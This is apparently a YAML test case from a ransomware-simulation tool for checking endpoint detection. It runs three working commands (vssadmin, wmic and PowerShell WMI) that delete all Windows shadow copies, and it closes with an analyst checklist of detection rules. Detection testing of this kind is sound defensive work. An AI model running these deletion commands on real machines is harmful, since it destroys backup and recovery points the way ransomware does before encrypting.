id: RANSIM_P2_001_shadow_copy_deletion
name: "Ransomware Phase 2 — Shadow Copy Deletion"
mitre: T1490
category: defense_evasion
description: >
  Attempts to delete shadow copies using three methods seen across ransomware families:
  vssadmin, wmic, and PowerShell. This is one of the highest-fidelity ransomware
  pre-cursor signals available. Even if no shadow copies exist, the attempt itself
  should be alerted on. Tests all three deletion methods independently.

requirements:
  os: windows
  admin: true

steps:
  - type: marker
    message: "[RANSIM P2] Attempting shadow copy deletion - method 1: vssadmin"

  - type: exec
    binary: cmd.exe
    args: /c vssadmin delete shadows /all /quiet
    timeout_seconds: 15

  - type: sleep
    seconds: 10

  - type: marker
    message: "[RANSIM P2] Attempting shadow copy deletion - method 2: wmic"

  - type: exec
    binary: cmd.exe
    args: /c wmic shadowcopy delete
    timeout_seconds: 15

  - type: sleep
    seconds: 10

  - type: marker
    message: "[RANSIM P2] Attempting shadow copy deletion - method 3: PowerShell WMI"

  - type: exec_powershell
    encoded: false
    command: |
      Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }
      Write-Host "PAS: WMI shadow copy deletion attempted"
    timeout_seconds: 15

  - type: sleep
    seconds: 30

analyst_checklist:
  - "EDR: Alert on vssadmin delete shadows? This is a near-universal ransomware signature."
  - "EDR: Was it blocked or detected-only? Blocking here means EDR stopped Phase 2."
  - "EDR: wmic shadowcopy delete captured separately from vssadmin?"
  - "EDR: PowerShell WMI deletion method caught — or only the binary methods?"
  - "Sysmon Event ID 1: All three methods logged with full command line?"
  - "SIEM: All three deletion attempts present? Or only some methods visible?"
  - "Rule opportunity (critical): vssadmin.exe with 'delete' and 'shadows' in commandline"
  - "Rule opportunity (critical): wmic.exe with 'shadowcopy' and 'delete' in commandline"
  - "Rule opportunity: PowerShell calling Win32_ShadowCopy.Delete() method"
  - "Gap check: If method 3 (PowerShell) wasn't detected, your coverage has a bypass."
